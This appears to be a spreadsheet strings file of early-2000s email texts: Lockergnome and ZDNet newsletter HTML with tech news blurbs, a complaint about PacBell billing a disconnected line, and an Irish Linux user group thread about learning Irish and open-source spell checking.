 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;50 LINUX TIPS:&lt;/b&gt; From the mind behind the Penguin Shell come two 
 more eBooks in the GnomeTome series. Whether you are a Linux newbie 
 or command line guru, you'll want these tips as part of your 
 information arsenal. 
 &lt;a href="http://www.gnometomes.com/tome/cat_linux.html"&gt;Get your copy&lt;/a&gt; 
 of Tony's Top 50 PenguinTWEAKS or Top 50 PenguinCORE tips today!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- FAVORITE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Susan Kare&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.kare.com"&gt;http://www.kare.com&lt;/a&gt;&lt;p&gt;
 As we move further into the future of Apple's Mac OS evolution, it 
 remains important to understand where things evolved from. Susan 
 Kare designed all the original icons for the Mac OS, way back in 
 1983. In fact, that smiling Mac that appears as OS X boots is her 
 creation. Check out her collection of UI artwork, from both Windows 
 and Mac operating systems. Also available from Kare.com are Kare 
 designed icon apparel and collections of fonts as designed by Susan.
 &lt;!-- GnomeTIP --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTIP&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 Show Info gives you access to change the application associated with a 
 particular file type, rename files, and reassign permissions. One of 
 the best features of Show Info is it's ability to store "comments" 
 related to a file or application. This can be a great place to store 
 information on recently made changes to a file, information from others 
 who've looked at a file, or in the case of applications, serial numbers 
 and other pertinent data you may need when dealing with tech support.
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/applecore/20020709.html"&gt;http://www.lockergnome.com/issues/applecore/20020709.html&lt;/a&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 8pt"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href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial.asp?source=cpu235"&gt;Computer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amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Apple Core Comment"&gt;E-mail the Editors&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p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</si>
  <si>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What you need for iPaq wireless connectivity (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=da-dT8jQUPq_yG4td5bjsMVKpv3DxnR" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=ef-04uYQmkHvc_A2HIqBxDVAmoBameR"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12, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_6EZsS98BbBL7kOi_yR" &gt;
 &lt;b&gt;What you need for iPaq wireless connectivity&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 A public health organization has several iPaqs on order, but
 now they want to add WAN connectivity to those PDAs. What
 exactly do they need to do? I'm so glad they asked. 
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6MJSb-Kd5q0_HZB17WnR" &gt;
 	 &lt;b&gt;Here's everything you need to know&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzA6E38WoP26D_8gaZjMeR" &gt;Security holds back Web services&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYwDmuvkEMLKlXBDgnVsR" &gt;China: Bursting with brainpower&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthwrVs3glpW-B_KMqztFR" &gt;Micron cranks handle on next-gen memory&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2GRneK4QA5K-fxuEL59R" &gt;Japan chipmakers team on 'SoCs' chip&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lckijvVtuoAABMMPZ9rR" &gt;HP tech exec jumps ship to EMC&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabL_d79lCW5CH7esbKRiR" &gt;Holes put Linux handheld at risk&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB4qyJ-H4QhaIHsSzky0PR" &gt;Microsoft bids to be creme de la CRM&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_60EEMZ5znP-FdWuurR"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src="http://techupdate.zdnet.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Desperately seeking chief ethics officer&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;Greedy CEOs&lt;/b&gt; are making a bad name for the profession--and corporate America. The title chief executive officer now
 conjures up an image of someone with questionable ethics, a
 greedy disposition, and a disregard for shareholders. If
 government-proposed remedies can"t adequately address this
 &lt;b&gt;ethics crisis&lt;/b&gt;, disgruntled shareholders surely will.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWI7IwzgRmkSWreAgRDciR" &gt;
 &lt;b&gt;Read my full commentary&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
  &lt;table cellpadding="0" cellspacing="0" border="0" width="220" align="right"&gt;
 &lt;tr valign=top&gt;
                 &lt;td&gt;
 &lt;img src="http://www.zdnet.com/enterprise/graphics/071102_ellison_quote.jpg" width="220" height="193" border="0"&gt;
 &lt;BR&gt;
                 &lt;/td&gt;
                 &lt;td width=10&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
   &lt;font size="+1"&gt;
   &lt;b&gt;Oracle challenges Microsoft anew&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Oracle is taking on Microsoft's Exchange with a &lt;b&gt;Collaboration Suite&lt;/b&gt; that includes e-mail, calendar and messaging software. Oracle has pitched its products as Microsoft replacements before -- with spectacularly little success. (At Comdex last November, the database giant offered its 9i and app-server software as a more secure &lt;b&gt;alternative to Exchange&lt;/b&gt;.) What's different this time? Oracle is selling a separate collaboration product that, says CEO &lt;b&gt;Larry Ellison&lt;/b&gt;, is cheaper than rival offerings. Plus: Companies facing a deadline to join Redmond's new &lt;b&gt;licensing program&lt;/b&gt; may be more open to non-Micrososft alternatives.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7S6yZ0Rxv3orMjEsaQPR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-SNwlL-_XGuwrfzJ6nnR" &gt;
 &lt;b&gt;Also: Ellison shrugs a No. 2 exec&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Standards stalled over royalty disputes&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The &lt;b&gt;World Wide Web Consortium&lt;/b&gt; is bracing for a vote next week that could decide once and for all how the standards body will handle patented technology that comes with royalties attached. If patented technology is rejected, the vote could mark a major shift in the Internet standards battle. Major intellectual property holders such as &lt;b&gt;Microsoft&lt;/b&gt; and &lt;b&gt;IBM&lt;/b&gt; have a lot at stake.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfGdJ4KnIz4s1RhjGRseR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7TNt2KHc-r7MBvWpjuyR" &gt;
 &lt;b&gt;Microsoft's OpenGL claim shakes graphics world&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 4--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Survey: Execs rethinking IT budgets&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Growing numbers of &lt;b&gt;Fortune 1000 CIOs&lt;/b&gt; are re-evaluating their IT budgets and spending plans for coming months, according to a recent survey. Morgan Stanley finds that CIOs' top priorities include security software, application integration and Windows 2000/XP upgrades for the desktop. &lt;b&gt;Integration challenges&lt;/b&gt; were slowing the rate of application adoption for 38 percent of those surveyed.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImbO8L8fU5CfCkxHB0FFR" &gt;
 &lt;b&gt;Read more survey results&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Oh look, a new bug in Outlook and IE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 A Danish security expert has warned of a security flaw in &lt;b&gt;Microsoft's ActiveX&lt;/b&gt; scripting component that allows network attackers to peek at cookies, read files and even run programs on a victim's PC. The expert recommended that users disable ActiveX in IE and Outlook, at least until Microsoft releases a patch.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04Fxty6t1F0F_wt9Q9dZuR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjfx28t3KQCL5-NPyEdsR" &gt;
 &lt;b&gt;Also: Outlook plug-in opens PCs to hackers&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- story 6 --&gt;
 &lt;!--&lt;font size="+1"&gt;&lt;b&gt;Cell phone personality test&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Whether you're a total gear head or you like to keep things simple, 
 take our cell phone personality test to find out which models suit you best.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBr98tuoSpqfRO9R6BpKlR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduMsDdkmnjZWSoS2P4Jm4R" &gt;
 &lt;b&gt;David Berlind's Rx for mobile happiness&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdYihKetPXydit0M-0OvrR"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href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7XhEm4lgVnxXFZcIuInR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVXvnkgFRmBekeVktk2eR" &gt;
 &lt;b&gt;Mixing Unix and Windows&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Most enterprises have a mix of Windows and Unix systems. &lt;b&gt;Larry Seltzer&lt;/b&gt; explores the options for interoperating those systems.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Q&amp;A&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2A7hthl11kOqFb2GVaGyR" &gt;
 &lt;b&gt;Marcelo Tosatti: The future is Linux&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The maintainer of the Linux kernel talks about new opportunities, defends &lt;b&gt;UnitedLinux&lt;/b&gt; and tells why copyright laws keep him from entering the U.S.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=01-9oXDI2jHgIC2jlXvurMPGPxZ6RlR" &gt;
 &lt;b&gt;ROI calculators don't tell the whole TCO story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In response to &lt;b&gt;David Berlind's&lt;/b&gt; "&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVqysbfpDblRuaBDxRU4R" &gt;&lt;b&gt;Dell's formula for ROI&lt;/b&gt;&lt;/a&gt;," TCO
 consultant &lt;b&gt;Tom Rankin&lt;/b&gt; warns that "99 percent of TCO tools do
 not look at the 'total' but may look at whatever parameters
 suit the vendor to sell their products/services."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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDmkMkLwzk0xBfd-8WrR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzSZe6FeVXCHnpqL0wRR" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8XqZjyrlqm86ccJ_2d2ZR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiUkdC9FIzceCGFySNP8dR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kirz33VHoaDkjVsTLZ8iR" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorT95eDr1yZeU_u_KnPR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2M_s2L9WLXZBXqONOVnR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdYUGDe5w8PF_jEuwteR" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExfloN066_4Mc3148lk6yR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOsKMP8VTRnU3P83P5XlR" &gt;Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwyCc9UcJeE4rbg6amtI4R" &gt;Check out these personal laser printer picks at ZDNet Reviews.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XWrkeRFchssDLfzpHOCerR" &gt;See how WAP works and how you should use it at Builder.com.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OHpB2c4EL2t1VlTK8yiR" &gt;Need a new job? Find one today in ZDNet's Career Center.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2hvu55_7DQESNPe-i4R" &gt;CIOs talk out about the future of IT at CNET News.com.&lt;/A&gt;&lt;/b&gt;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href='http://clickthru.online.com/Click?q=53-n8WdzBn2B4NM-pRiHAvr_q0xI45rEdRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLFxMx8ywvjsK-FdLPRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjqsXIiUywq2NRJSBTZR"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href="http://clickthru.online.com/Click?q=92-ubRVQTzTtq5_hCozeFOPq1FsnynR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDGT79pGLF5vLk7KCgFeR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6Bdhi5rkcQmobF8XEDxwcyR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlGzX3e03Gl22vbAOyenR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfHpzCKWVqS8CMB0qvseR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4FdE4pya9-0t3VVat9yR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4W8coppGX3VynhNBuCqlR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHferEsYZBBBkqU8niQ74R" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHJgKMLEPFPcZsjpRp-LrR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=50-M_6Bns0jgu_i3lf5G5ysjtTgzRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I call PacBell/SBC every two or three months about a recurring problem 
 we have at my house:
 We get a phone bill every month for someone who no longer lives at our 
 house for a phone line which has been disconnected for over three years 
 and the account balance is (drum roll please) $0.00! Sometimes the 
 people I talk to cannot locate the account in their system and tell me 
 that the phone number doesn't exist. Some people are able to locate the 
 account but say that it has been disconnected and there is no way we 
 could get a bill sent to us for that account. Some people can locate the 
 account and verify that the line has been disconnected for three years 
 and that the amount owed is $0.00 and then they say somthing along the 
 lines of "Huh?" or "I'm not sure what's going on... Hold please." And 
 eventually I have similar conversations with their managers and the 
 account representatives and billing people and their managers and their 
 managers' managers ad naseum.
 The outcome of every phone call is that they'll "look into it" and fix 
 the problem and I might receive one or two more bills depending on when 
 it's resolved. So I wait a month or two and send the bills back marked 
 "Not at this address, please fsck off." and then eventually call them 
 back and go through the whole process again. Lately I just explain to 
 the phone jockeys that I know it's not their fault and I'm not mad at 
 them and it's just not their day because I'm about to give them hell. 
 Then I give them the opportunity to have me yell at their boss which 
 they seem all too happy to do.
 At least it gives me a positive way to vent my aggressions and it's a 
 lot cheaper than seeing a therapist.
 Perplexed,
 Elias
 bitbitch@magnesium.net wrote:
 &gt;
 &gt;So I get a check from Pac Bell today (SBC as they're called now).
 &gt;Turns out, they went to the trouble of printing out, signing, sealing
 &gt;and stamping a check just to refund me for a whole $0.33.
 &gt;
 &gt;[...]
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG-Social] Re: [ILUG] Fwd: Linux Beer Hike
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:04:44PM +0100, Alan Horkan wrote:
 &gt; does Spanish still count as a foreign language in America?
 &gt; :)
 yep, that's what i learned as it seemed more useful then the other
 choice: french.  and that's what seems to count as "internationalisation":
 support of spanish.
 &gt; Watch out for the political indoctrination at these irish language
 &gt; schools, when i was teenager they had use marching saluting the flag
 &gt; singing the national anthem and the college anthem.  Presumably they treat
 &gt; adult learners with a little more dignity and dont send them home for a
 &gt; minor outburst of English in emotional circustances despite having better
 &gt; Irish than half of the other people there.
 if i go to a class, i'm there to learn.  if they throw in anthems or
 politics, i'll take what i can learn from that and i'll take in a new
 perspective, but i'll only do that with my critical thinking cap on.
 just like i do when i watch mass media.  and yes, from the one irish
 course i took in dublin, they do the national anthem.  which is fine
 really - i started off each day in school in america with the pledge of
 allegience (with the under god bit in it which annoyed my dad to no end).
 if that sort of thing didn't stick at the age of five, i severely doubt
 it will stick now.
 &gt; Just to mention open source software agus gaeilge, OpenOffice could do
 &gt; with having an Irish ispell dictionary converted to work with it.
 &gt; Abiword already has irish spell checking and a few of the interface
 &gt; strings translated (was about 85% about 18 months ago but it has drifted
 &gt; to some horribly small percentage).
 and see, that would be my retort to any overly zealous irish speaker.
 there's a huge opportunity for a fully irish computing environment in
 free software.  and yet i don't see much action from official irish
 organisations.  the reason mandrake and some others have the irish
 support they have is because of individuals like donnacha.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Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: We Pay your bills :o) [w1ypq]
</t>
  </si>
  <si>
